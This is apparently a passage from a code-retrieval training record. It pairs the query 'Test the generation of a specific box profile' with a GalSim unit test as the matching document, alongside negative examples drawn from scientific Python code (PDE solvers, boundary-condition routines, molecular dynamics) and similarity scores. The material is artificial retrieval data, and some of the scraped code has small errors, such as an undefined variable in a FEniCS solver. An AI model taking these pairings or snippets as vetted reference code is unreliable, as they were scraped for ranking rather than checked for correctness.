0.5*dt*np.diff(flux_0 + flux_1, axis=0) \n\n m_com = Qn[:,1] + FB*Qn[:,4]\n \n rho = Qn[:,0] + FB*Qn[:,3]\n eps_g = Qn[:,0] / rho ; eps_d = Qn[:,3] / rho\n rho /= np.diff(xe[stencil:-stencil])\n\n df = (eps_g*(f_d0+f_d1) - eps_d*(f_g0+f_g1)) / 2\n\n dm = (eps_g*Q[:,4] - eps_d*Q[:,1]) * np.exp(-K*rho*dt) \n dm += df *-np.expm1(-dt*K*rho)/(K*rho)\n \n m_d = eps_d * m_com + dm\n m_g = eps_g * m_com - dm*FB\n\n #11. Update Conserved quantities\n Q[:] = Qn\n\n Q[:,1] = m_g\n Q[:,4] = m_d\n\n # Heating due to drag to conserve energy\n if FB:\n Q[:,2] -= 0.5*(Q[:,4]**2 - Qn[:,4]**2) / Q[:,3]\n \n\n # Return\n xc = xc[stencil:-stencil]\n xe = xe[stencil:-stencil]\n\n return xc, xe, Q\n\n # Set the initial conditions\n dx = np.diff(xe).reshape(-1,1)\n W = IC(xe)\n U = prim2cons(W)\n Q = U * dx\n\n t = 0\n while t < tout:\n\n U = Q/dx\n\n vf = 0\n if lagrangian:\n vf = U[:,1] / U[:,0]\n dtmax = Ca * np.min(dx / max_wave_speed(U, vf))\n dt = min(dtmax, tout-t)\n\n xc, xe, Q = RK2_prim(xc, Q, dt)\n dx = np.diff(xe).reshape(-1,1)\n \n t = min(tout, t+dt)\n \n\n return xc, xe, cons2prim(Q/dx)", "def boundary_conditions(x, t, z=None, nbsym=2):\n indmax = argrelmax(x)[0]\n indmin = argrelmin(x)[0]\n lx = x.shape[0] - 1\n if indmin.shape[0] + indmax.shape[0] < 3:\n raise ValueError(\"Not enough extrema.\")\n\n if indmax[0] < indmin[0]:\n if x[0] > x[indmin[0]]:\n lmax = indmax[1:np.min([indmax.shape[0], nbsym + 1])][::-1]\n lmin = indmin[:np.min([indmin.shape[0], nbsym])][::-1]\n lsym = indmax[0]\n else:\n lmax = indmax[1:np.min([indmax.shape[0], nbsym])][::-1]\n lmin = indmin[:np.min([indmin.shape[0], nbsym - 1])][::-1]\n lmin = np.hstack((lmin, [1]))\n lsym = 1\n else:\n if x[0] < x[indmax[0]]:\n lmax = indmax[:np.min([indmax.shape[0], nbsym])][::-1]\n lmin = indmin[1:np.min([indmin.shape[0], nbsym + 1])][::-1]\n lsym = indmin[0]\n else:\n lmax = indmax[:np.min([indmin.shape[0], nbsym - 1])][::-1]\n lmax = np.hstack((lmax, [1]))\n lmin = indmin[:np.min([indmax.shape[0], nbsym])][::-1]\n lsym = 1\n\n if indmax[-1] < indmin[-1]:\n if x[-1] < x[indmax[-1]]:\n rmax = indmax[(max([indmax.shape[0] - nbsym + 1, 1]) - 1):][::-1]\n rmin = indmin[(max([indmin.shape[0] - nbsym, 1]) - 1):-1][::-1]\n rsym = indmin[-1]\n else:\n rmax = indmax[max(indmax.shape[0] - nbsym + 1, 0):indmax.shape[0]][::-1]\n rmax = np.hstack(([lx], rmax))\n rmin = indmin[max(indmin.shape[0] - nbsym, 0):][::-1]\n rsym = lx\n else:\n if x[-1] > x[indmin[-1]]:\n rmax = indmax[max(indmax.shape[0] - nbsym - 1, 0):-1][::-1]\n rmin = indmin[max(indmin.shape[0] - nbsym, 0):][::-1]\n rsym = indmax[-1]\n else:\n rmax = indmax[max(indmax.shape[0] - nbsym, 0):][::-1]\n rmin = indmin[max(indmin.shape[0] - nbsym + 1, 0):][::-1]\n rmin = np.hstack(([lx], rmin))\n rsym = lx\n\n tlmin = 2 * t[lsym] - t[lmin]\n tlmax = 2 * t[lsym] - t[lmax]\n trmin = 2 * t[rsym] - t[rmin]\n trmax = 2 * t[rsym] - t[rmax]\n\n # In case symmetrized parts do not extend enough\n if (tlmin[0] > t[0]) or (tlmax[0] > t[1]):\n if lsym == indmax[0]:\n lmax = indmax[:np.min((indmax.shape[0], nbsym))][::-1]\n else:\n lmin = indmin[:np.min((indmin.shape[0], nbsym))][::-1]\n if lsym == 1:\n raise Exception(\"Bug\")\n lsym = 1\n tlmin = 2 * t[lsym] - t[lmin]\n tlmax = 2 * t[lsym] - t[lmax]\n\n if (trmin[-1] < t[lx]) or (trmax[-1] < t[lx]):\n if rsym == indmax.shape[0]:\n rmax = indmax[np.max([indmax.shape[0] - nbsym + 1,\n 1]):indmax.shape[0]][::-1]\n else:\n rmin = indmin[np.max([indmax.shape[0] - nbsym + 1,\n 1]):indmin.shape[0]][::-1]\n\n if rsym == lx:\n raise Exception(\"bug\")\n rsym = lx\n trmin = 2 * t[rsym] - t[rmin]\n trmax = 2 * t[rsym] - t[rmax]\n\n if z is None:\n z = x\n zlmax = z[lmax]\n zlmin = z[lmin]\n zrmax = z[rmax]\n zrmin = z[rmin]\n\n tmin = map(np.array, [tlmin, t[indmin], trmin])\n tmax = map(np.array, [tlmax, t[indmax], trmax])\n zmin = map(np.array, [zlmin, z[indmin], zrmin])\n zmax = map(np.array, [zlmax, z[indmax], zrmax])\n\n tmin, tmax, zmin, zmax = map(np.hstack, [tmin, tmax, zmin, zmax])\n return tmin, tmax, zmin, zmax", "def _solve_explicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n current_solution = initial_conditions\n next_solution = np.empty_like(current_solution)\n solutions = []\n\n for t in self.t_grid:\n next_solution[1:-1] = (\n current_solution[1:-1]\n + (current_solution[:-2] - 2 * current_solution[1:-1] + current_solution[2:]) * coeff\n ) + self.rhs(self.x_grid[1:-1], t) * self.tau\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n next_solution[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n next_solution[0] = (\n 4 * next_solution[1]\n - next_solution[2]\n - 2 * self.h * self.left_bc(t)\n ) / 3.0\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n next_solution[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n next_solution[-1] = (\n 4 * next_solution[-2]\n - next_solution[-3]\n + 2 * self.h * self.right_bc(t)\n ) / 3.0\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def _apply_boundary_condition(da, dim, left, boundary=None, fill_value=0.0):\n\n if boundary not in [\"fill\", \"extend\", \"extrapolate\"]:\n raise ValueError(\n \"`boundary` must be 'fill', 'extend' or \"\n \"'extrapolate', not %r.\" % boundary\n )\n\n axis_num = da.get_axis_num(dim)\n\n # the shape for the edge array\n shape = list(da.shape)\n shape[axis_num] = 1\n\n base_array = da.data\n index = slice(0, 1) if left else slice(-1, None)\n edge_array = da.isel(**{dim: index}).data\n\n use_dask = has_dask and isinstance(base_array, dsa.Array)\n\n if boundary == \"extend\":\n boundary_array = edge_array\n elif boundary == \"fill\":\n args = shape, fill_value\n kwargs = {\"dtype\": base_array.dtype}\n if use_dask:\n full_func = dsa.full\n kwargs[\"chunks\"] = edge_array.chunks\n else:\n full_func = np.full\n boundary_array = full_func(*args, **kwargs)\n elif boundary == \"extrapolate\":\n gradient_slice = slice(0, 2) if left else slice(-2, None)\n gradient_sign = -1 if left else 1\n linear_gradient = da.isel(**{dim: gradient_slice}).diff(dim=dim).data\n boundary_array = edge_array + gradient_sign * linear_gradient\n\n return boundary_array", "def fv(X,Y,dx,dy,r2,i,append,L,N,U,dt,close_list,Nlist,vel_verlet_on,R,menu,submenu,n1,grid,G,wallcount,X2):\r\n\r\n \"\"\"JV: append is a boolean. If it's true, adds the energy to our list, if it isn't, it doesn't.\r\n We do that because in some cases we will call the algorithm more times than the actual step number (and\r\n we only want to sum the value T/dt times), this is needed in the velocity-Verlet algorithm, that we call the fv()\r\n function one more time than needed just to start the loop.\"\"\"\r\n\r\n# L = self.param[2]\r\n#\r\n# N = self.particles.size\r\n\r\n #For computing all the distances I use a trick with the meshgrid function,\r\n #see the documentation on how this works if you dont see it.\r\n\r\n \"\"\"JV: X is an array that contains each position, mx is an nxn array that each column is the position of one particle (so it's a matrix\r\n that has n X rows) and mxt is the same but tranposed (so it's a matrix of n X columns)\"\"\"\r\n\r\n \"\"\"\r\n UPDATE: This block of code is commented because now it's done in a loop inside solve_verlet() (due to Numba...).\r\n Looks a little bit messy but if Numba allowed me to call the np.meshgrid() function we would do this here. Sorry, but I like to keep the comment to remind me that.\r\n \"\"\"\r\n # MX, MXT = np.meshgrid(X,X,copy=False)\r\n # MY, MYT = np.meshgrid(Y,Y,copy=False)\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n # dx = MXT - MX\r\n # dx = dx\r\n\r\n # dy = MYT - MY\r\n # dy = dy\r\n\r\n # r2 = np.square(dx)+np.square(dy)\r\n\r\n # if(menu == \"Free!\"):\r\n # #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n # dx_v2 = (np.abs(dx.copy())-1*L)\r\n # r2_v2 = dx_v2**2+dy**2\r\n # dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n # dy_v2 = (np.abs(dy.copy())-1*L)\r\n # r2_v2 = dx**2+dy_v2**2\r\n # dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n # r2_v2 = dx_v2**2+dy_v2**2\r\n # dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n # dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n # r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n\r\n dUx = 0.\r\n dUy = 0.\r\n utot = np.zeros((N))\r\n f = np.zeros((N,2))\r\n\r\n for j in range(0,N):\r\n dUx = 0.\r\n dUy = 0.\r\n u = 0.\r\n\r\n #JV: we now calculate the force with only the Nlist closest particles\r\n for k in range(0,Nlist):\r\n c = int(close_list[j][k])\r\n\r\n #In the force computation we include the LJ and the walls (JV: in the verlet case). I truncate the interaction at self.R units of lenght,\r\n #I also avoid distances close to 0 (which only should affect the diagonal in the matrix of distances)\r\n #All these conditions are included using the numpy.where function.\r\n #If you want to include more forces you only need to add terms to these lines.\r\n\r\n if(vel_verlet_on == True):\r\n if((r2[j,c] < 4*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n dUx = dUx + dLJverlet(dx[j,c],r2[j,c],R[j],R[c])\r\n dUy = dUy + dLJverlet(dy[j,c],r2[j,c],R[j],R[c])\r\n # print(dUx,dUy,dx[j,c],r2[j,c],R[j],R[c])\r\n#JV: COMMENTED PART BECAUSE NUMBA HAS PROBLEMS WITH THIS BLOCK OF CODE THAT DOES THE CALCULATION IN THE VERLET ALGORITHM, NOW IT ONLY WORKS WITH THE VELOCITY VERLET, TO FIX\"\r\n# else:\r\n# if((r2[j,c] < 4*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n# dUx = dUx + dLJverlet(dx[j,c],r2[j,c],R[j],R[c]) - dwalls([X[j],Y[j]],param)\r\n# dUy = dUy + dLJverlet(dy[j,c],r2[j,c],R[j],R[c]) - dwalls([X[j],Y[j]],param)\r\n\r\n #JV: We add the energy in the corresponding array in both cases, remember that the verlet algorithm will include the energy from the walls\r\n # and that will be visible in fluctuations on the energy\r\n if(vel_verlet_on == True):\r\n if((r2[j,c] < 2*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n u = u + LJverlet(r2[j,c],R[c],R[j])\r\n# else:\r\n# u = u + walls([X[j],Y[j]])#JV: TO CHANGE; NOW ONLY WORKS WITH VEL_VERLET_ON\r\n# else:\r\n# if((r2[j,c] < 2*max(R[j],R[c])) and (r2[j,c] > 10**(-2))):\r\n# u = u + LJverlet(r2[j,c],R[c],R[j],param)\r\n#\r\n# if((X[j]**2+Y[j]**2) > (0.8*L)**2):\r\n# u = u + walls([X[j],Y[j]],param)\r\n #JV: COMMENTED FOR NOW\r\n\r\n #JV: If the argument it's True, we will append the energy to our corresponding array\r\n if(append == True):\r\n utot[j] = u\r\n\r\n f[j,:] = f[j,:]+np.array([dUx,dUy])\r\n\r\n if(append == True):\r\n U[int(i)] = np.sum(utot) #JV: Finally, we add the total energy so we have the global energy in a step of time\r\n\r\n return f", "def logic(self):\r\n raise NotImplementedError", "def calculateElementBoundaryCoefficients(self):\n pass", "def _inner_loop(dets, exposure_count, delay, deadline, per_step,\n stream_name, done_signal=None):\n if done_signal is not None:\n\n from bluesky.utils import first_key_heuristic \n signal_key = first_key_heuristic(done_signal)\n def _check_signal():\n val = yield from bps.read(done_signal)\n if val is None:\n return True\n val = val[signal_key]['value']\n return bool(val)\n else:\n _check_signal = None\n\n for j in range(exposure_count):\n start_time = time.monotonic()\n\n yield from bps.checkpoint()\n # if things get bogged down in data collection, bail early!\n if start_time > deadline:\n print(f'{start_time} > {deadline} bail!')\n break\n\n # this triggers the cameras\n yield from per_step(dets, stream_name)\n\n stop_time = time.monotonic()\n exp_actual = stop_time - start_time\n sleep_time = delay - exp_actual\n\n yield from bps.checkpoint()\n if _check_signal is not None:\n done = yield from _check_signal()\n if done:\n return\n if stop_time + sleep_time > deadline:\n yield from bps.sleep(deadline - stop_time)\n return\n else:\n yield from bps.sleep(delay - exp_actual)", "def array_part_L2_loops_pruning(loops, config):\n pruned_loops = []\n tuning = config['tuning']\n loop_stop = 0\n for c in tuning['array_part_L2']['coincident']:\n if not c:\n break\n loop_stop += 1\n ubs = tuning['array_part_L2']['tilable_loops'][loop_stop:]\n for loop in loops:\n # Examine [loop_stop:-1], only leave those that equal the upper bound\n loop_cut = loop[loop_stop:]\n if loop_cut != ubs:\n continue\n pruned_loops.append(loop)\n\n return pruned_loops", "def solver_bc(\n kappa, f, # Coefficients in the PDE\n boundary_conditions, # Dict of boundary conditions\n Nx, Ny, # Cell division of the domain\n degree=1, # Polynomial degree\n subdomains=[], # List of SubDomain objects in domain\n linear_solver='Krylov', # Alt: 'direct'\n abs_tol=1E-5, # Absolute tolerance in Krylov solver\n rel_tol=1E-3, # Relative tolerance in Krylov solver\n max_iter=1000, # Max no of iterations in Krylov solver\n log_level=PROGRESS, # Amount of solver output\n dump_parameters=False, # Write out parameter database?\n debug=False,\n ):\n # Create mesh and define function space\n mesh = UnitSquareMesh(Nx, Ny)\n V = FunctionSpace(mesh, 'P', degree)\n\n tol = 1E-14\n\n # Subdomains in the domain?\n import numpy as np\n if subdomains:\n # subdomains is list of SubDomain objects,\n # p is array of corresponding constant values of p\n # in each subdomain\n if not isinstance(kappa, (list, tuple, np.ndarray)):\n raise TypeError(\n 'kappa must be array if we have sudomains, not %s'\n % type(kappa))\n materials = CellFunction('size_t', mesh)\n materials.set_all(0) # \"the rest\"\n for m, subdomain in enumerate(subdomains[1:], 1):\n subdomain.mark(materials, m)\n\n kappa_values = kappa\n V0 = FunctionSpace(mesh, 'DG', 0)\n kappa = Function(V0)\n help = np.asarray(materials.array(), dtype=np.int32)\n kappa.vector()[:] = np.choose(help, kappa_values)\n else:\n if not isinstance(kappa, (Expression, Constant)):\n raise TypeError(\n 'kappa is type %s, must be Expression or Constant'\n % type(kappa))\n\n # Boundary subdomains\n class BoundaryX0(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[0]) < tol\n\n class BoundaryX1(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[0] - 1) < tol\n\n class BoundaryY0(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[1]) < tol\n\n class BoundaryY1(SubDomain):\n def inside(self, x, on_boundary):\n return on_boundary and abs(x[1] - 1) < tol\n\n # Mark boundaries\n boundary_markers = FacetFunction('size_t', mesh)\n boundary_markers.set_all(9999)\n bx0 = BoundaryX0()\n bx1 = BoundaryX1()\n by0 = BoundaryY0()\n by1 = BoundaryY1()\n bx0.mark(boundary_markers, 0)\n bx1.mark(boundary_markers, 1)\n by0.mark(boundary_markers, 2)\n by1.mark(boundary_markers, 3)\n\n # Redefine boundary integration measure\n ds = Measure('ds', domain=mesh, subdomain_data=boundary_markers)\n\n # Collect Dirichlet conditions\n bcs = []\n for i in boundary_conditions:\n if 'Dirichlet' in boundary_conditions[i]:\n bc = DirichletBC(V, boundary_conditions[i]['Dirichlet'],\n boundary_markers, i)\n bcs.append(bc)\n\n if debug:\n # Print all vertices that belong to the boundary parts\n for x in mesh.coordinates():\n if bx0.inside(x, True): print('%s is on x = 0' % x)\n if bx1.inside(x, True): print('%s is on x = 1' % x)\n if by0.inside(x, True): print('%s is on y = 0' % x)\n if by1.inside(x, True): print('%s is on y = 1' % x)\n\n # Print the Dirichlet conditions\n print('Number of Dirichlet conditions:', len(bcs))\n if V.ufl_element().degree() == 1: # P1 elements\n d2v = dof_to_vertex_map(V)\n coor = mesh.coordinates()\n for i, bc in enumerate(bcs):\n print('Dirichlet condition %d' % i)\n boundary_values = bc.get_boundary_values()\n for dof in boundary_values:\n print(' dof %2d: u=%g' % (dof, boundary_values[dof]))\n if V.ufl_element().degree() == 1:\n print(' at point %s' %\n (str(tuple(coor[d2v[dof]].tolist()))))\n\n # Define trial and test functions\n u = TrialFunction(V)\n v = TestFunction(V)\n\n # Collect Neumann integrals\n integrals_N = []\n for i in boundary_conditions:\n if 'Neumann' in boundary_conditions[i]:\n if boundary_conditions[i]['Neumann'] != 0:\n g = boundary_conditions[i]['Neumann']\n integrals_N.append(g*v*ds(i))\n\n # Collect Robin integrals\n integrals_R_a = []\n integrals_R_L = []\n for i in boundary_conditions:\n if 'Robin' in boundary_conditions[i]:\n r, s = boundary_conditions[i]['Robin']\n integrals_R_a.append(r*u*v*ds(i))\n integrals_R_L.append(r*s*v*ds(i))\n\n # Simpler Robin integrals\n integrals_R = []\n for i in boundary_conditions:\n if 'Robin' in boundary_conditions[i]:\n r, s = boundary_conditions[i]['Robin']\n integrals_R.append(r*(u - s)*v*ds(n))\n\n # Define variational problem, solver_bc\n a = kappa*dot(grad(u), grad(v))*dx + sum(integrals_R_a)\n L = f*v*dx - sum(integrals_N) + sum(integrals_R_L)\n\n # Simpler variational formulation\n F = kappa*dot(grad(u), grad(v))*dx + \\\n sum(integrals_R) - f*v*dx + sum(integrals_N)\n a, L = lhs(F), rhs(F)\n\n # Compute solution\n u = Function(V)\n\n if linear_solver == 'Krylov':\n prm = parameters['krylov_solver'] # short form\n prm['absolute_tolerance'] = abs_tol\n prm['relative_tolerance'] = rel_tol\n prm['maximum_iterations'] = max_iter\n print(parameters['linear_algebra_backend'])\n set_log_level(log_level)\n if dump_parameters:\n info(parameters, True)\n solver_parameters = {'linear_solver': 'gmres',\n 'preconditioner': 'ilu'}\n else:\n solver_parameters = {'linear_solver': 'lu'}\n\n solve(a == L, u, bcs, solver_parameters=solver_parameters)\n return u, kappa # Note: kappa may be modified (Function on V0)", "def construct_inv_boundaries(params,par_dict,eq_dict,K_RC,K_CP,m_P):\n #intrapop params\n q1=par_dict['q1']\n q2=par_dict['q2']\n K =par_dict['K']\n m_C= K_CP*m_P\n q10 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n\n #interpop params\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n\n #eq values\n\n #L-V\n R_eq_s2 = eq_dict['R_eq_s2']\n C_eq_s2 = eq_dict['C_eq_s2']\n P_eq_s3 = eq_dict['P_eq_s3']\n R_eq_s3 = eq_dict['R_eq_s3']\n #R-M\n R_eq_s2RM = eq_dict['R_eq_s2RM']\n C_eq_s2RM = eq_dict['C_eq_s2RM']\n R_eq_s3RM = eq_dict['R_eq_s3RM']\n P_eq_s3RM = eq_dict['P_eq_s3RM']\n \n ##Invasibility boundaries\n\n #L-V\n I_C_s2 = set_I_C_s2(e1,a1,K,q1)\n I_P_s3 = set_I_P_s3(e2,a2,K,q2)\n I_P_s4 = set_I_P_s4(e2,e3,a2,a3,q2,R_eq_s2,C_eq_s2)\n I_C_s5 = set_I_C_s5(e1,a1,a3,R_eq_s3,P_eq_s3,q1)\n \n #R-M\n I_C_s2RM = set_I_C_s2RM(e1,a1,K,q1,hC0,q10)\n I_P_s3RM = set_I_P_s3RM(e2,a2,K,q2,hP0,q20)\n I_P_s4RM = set_I_P_s4RM(e2,e3,a2,a3,q2,R_eq_s2RM,C_eq_s2RM,hP0,q20)\n I_C_s5RM = set_I_C_s5RM(e1,e2,a1,a3,m_C,R_eq_s3RM,P_eq_s3RM,q1,t_hc,q10,q20,hP0,hC0) \n\n inv_dict= {'I_C_s2':I_C_s2,'I_P_s3':I_P_s3,'I_P_s4':I_P_s4,'I_C_s5':I_C_s5,\n 'I_C_s2RM':I_C_s2RM,'I_P_s3RM':I_P_s3RM,'I_P_s4RM':I_P_s4RM,'I_C_s5RM':I_C_s5RM}\n\n return inv_dict" ]
[ "0.6390884", "0.633568", "0.63244265", "0.6194868", "0.6181194", "0.6133254", "0.5930542", "0.58581144", "0.58474624", "0.58428305", "0.5813989", "0.5792263", "0.57295126", "0.57068944", "0.5669466", "0.5665661", "0.5663369", "0.56552625", "0.56534404", "0.56359583", "0.5629656", "0.5625885", "0.5621039", "0.56177205", "0.5613318", "0.56057847", "0.5581545", "0.55674595", "0.5565062", "0.55598754", "0.55513936", "0.5535068", "0.5520251", "0.5491375", "0.5484487", "0.5476811", "0.5474016", "0.5473386", "0.54710454", "0.5448324", "0.5431971", "0.54275113", "0.5423188", "0.5421202", "0.54175735", "0.54098344", "0.54057854", "0.54014724", "0.5398196", "0.5357134", "0.5357134", "0.53329104", "0.53308696", "0.53308696", "0.5330452", "0.53256893", "0.5318197", "0.53139657", "0.53101456", "0.5284062", "0.52738905", "0.5273163", "0.5270081", "0.52601796", "0.5259099", "0.52575207", "0.52550286", "0.5244608", "0.52388895", "0.5235186", "0.5233778", "0.5231", "0.52256685", "0.521741", "0.5216009", "0.5207838", "0.52074885", "0.5203855", "0.5196744", "0.5196204", "0.51950413", "0.51946574", "0.5193127", "0.51912785", "0.518946", "0.51888084", "0.5187227", "0.5186817", "0.51839256", "0.51811516", "0.5179807", "0.5177502", "0.51755744", "0.5165309", "0.51623386", "0.5152163", "0.51498634", "0.5146199", "0.51459", "0.5145887", "0.51394874" ]
0.0
-1
Test the generation of a specific box profile against a known result.
def test_box(): savedImg = galsim.fits.read(os.path.join(imgdir, "box_1.fits")) myImg = galsim.ImageF(savedImg.bounds, scale=0.2) myImg.setCenter(0,0) test_flux = 1.8 pixel = galsim.Pixel(scale=1, flux=1) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel disagrees with expected result") np.testing.assert_array_equal( pixel.scale, 1, err_msg="Pixel scale returned wrong value") # Check with default_params pixel = galsim.Pixel(scale=1, flux=1, gsparams=default_params) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel with default_params disagrees with expected result") pixel = galsim.Pixel(scale=1, flux=1, gsparams=galsim.GSParams()) pixel.drawImage(myImg, method="sb", use_true_center=False) np.testing.assert_array_almost_equal( myImg.array, savedImg.array, 5, err_msg="Using GSObject Pixel with GSParams() disagrees with expected result") # Use non-unity values. pixel = galsim.Pixel(flux=1.7, scale=2.3) gsp = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) pixel2 = galsim.Pixel(flux=1.7, scale=2.3, gsparams=gsp) assert pixel2 != pixel assert pixel2 == pixel.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) # Test photon shooting. do_shoot(pixel,myImg,"Pixel") # Check picklability do_pickle(pixel, lambda x: x.drawImage(method='no_pixel')) do_pickle(pixel) do_pickle(galsim.Pixel(1)) # Check that non-square Box profiles work correctly scale = 0.2939 # Use a strange scale here to make sure that the centers of the pixels # never fall on the box edge, otherwise it gets a bit weird to know what # the correct SB value is for that pixel. im = galsim.ImageF(16,16, scale=scale) gsp = galsim.GSParams(maximum_fft_size = 30000) for (width,height) in [ (3,2), (1.7, 2.7), (2.2222, 3.1415) ]: box = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp) check_basic(box, "Box with width,height = %f,%f"%(width,height)) do_shoot(box,im,"Box with width,height = %f,%f"%(width,height)) if __name__ == '__main__': # These are slow because they require a pretty huge fft. # So only do them if running as main. do_kvalue(box,im,"Box with width,height = %f,%f"%(width,height)) cen = galsim.PositionD(0, 0) np.testing.assert_equal(box.centroid, cen) np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(box.flux, test_flux) np.testing.assert_almost_equal(box.xValue(cen), box.max_sb) np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.-0.001), box.max_sb) np.testing.assert_almost_equal(box.xValue(width/2.-0.001, height/2.+0.001), 0.) np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.-0.001), 0.) np.testing.assert_almost_equal(box.xValue(width/2.+0.001, height/2.+0.001), 0.) np.testing.assert_array_equal( box.width, width, err_msg="Box width returned wrong value") np.testing.assert_array_equal( box.height, height, err_msg="Box height returned wrong value") gsp2 = galsim.GSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) box2 = galsim.Box(width=width, height=height, flux=test_flux, gsparams=gsp2) assert box2 != box assert box2 == box.withGSParams(gsp2) assert box2 != box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) assert box2.withGSParams(maximum_fft_size=30000) == box.withGSParams(xvalue_accuracy=1.e-8, kvalue_accuracy=1.e-8) # Check picklability do_pickle(box, lambda x: x.drawImage(method='no_pixel')) do_pickle(box) do_pickle(galsim.Box(1,1)) # Check sheared boxes the same way box = galsim.Box(width=3, height=2, flux=test_flux, gsparams=gsp) box = box.shear(galsim.Shear(g1=0.2, g2=-0.3)) check_basic(box, "Sheared Box", approx_maxsb=True) do_shoot(box,im, "Sheared Box") if __name__ == '__main__': do_kvalue(box,im, "Sheared Box") do_pickle(box, lambda x: x.drawImage(method='no_pixel')) do_pickle(box) cen = galsim.PositionD(0, 0) np.testing.assert_equal(box.centroid, cen) np.testing.assert_almost_equal(box.kValue(cen), (1+0j) * test_flux) np.testing.assert_almost_equal(box.flux, test_flux) np.testing.assert_almost_equal(box.xValue(cen), box.max_sb) # This is also a profile that may be convolved using real space convolution, so test that. if __name__ == '__main__': conv = galsim.Convolve(box, galsim.Pixel(scale=scale), real_space=True) check_basic(conv, "Sheared Box convolved with pixel in real space", approx_maxsb=True, scale=0.2) do_kvalue(conv,im, "Sheared Box convolved with pixel in real space") do_pickle(conv, lambda x: x.xValue(0.123,-0.456)) do_pickle(conv)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_game_boxscore(self):\n pass", "def testProfileCreation(self):\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\n \n self.assertEqual(small_tree1_equality, True)\n self.assertEqual(small_tree2_equality, True)\n self.assertEqual(known_tree1_equality, True)\n self.assertEqual(known_tree2_equality, True)", "def testProfileCreation(self):\r\n small_tree1_equality = self.checkProfileEquality(self.profiles[0], self.small_profile1)\r\n small_tree2_equality = self.checkProfileEquality(self.profiles[1], self.small_profile2)\r\n known_tree1_equality = self.checkProfileEquality(self.profiles[2], self.known_profile1)\r\n known_tree2_equality = self.checkProfileEquality(self.profiles[3], self.known_profile2)\r\n\r\n self.assertEqual(small_tree1_equality, True)\r\n self.assertEqual(small_tree2_equality, True)\r\n self.assertEqual(known_tree1_equality, True)\r\n self.assertEqual(known_tree2_equality, True)", "def test_boxscore_scores(self):\n test_hteam_totals = self.BS.hTeam_totals['points']\n answer_hteam_totals = '140'\n test_vteam_totals = self.BS.vTeam_totals['points']\n answer_vteam_totals = '111'\n\n self.assertEqual(test_hteam_totals, answer_hteam_totals)\n self.assertEqual(test_vteam_totals, answer_vteam_totals)", "def test():\n suite = unittest.TestLoader().loadTestsFromTestCase(TestIBox)\n runtime = unittest.TextTestRunner(verbosity=2).run(suite)\n return runtime.wasSuccessful()", "def bak_verify_server_profile_general_info(*profile_obj):\n selenium2lib = ui_lib.get_s2l()\n\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n for profile in profile_obj:\n server = profile.server\n hardwaretype = profile.hardwareType\n enclosuregroup = profile.enclgroup\n\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_ELEMENT_PROFILE_NAME_BASE % profile.name)\n BuiltIn().sleep(5) # wait for fields to load\n\n logger.info(\"Verifying server hardware for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_SERVER, server, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_SERVER)\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, server))\n 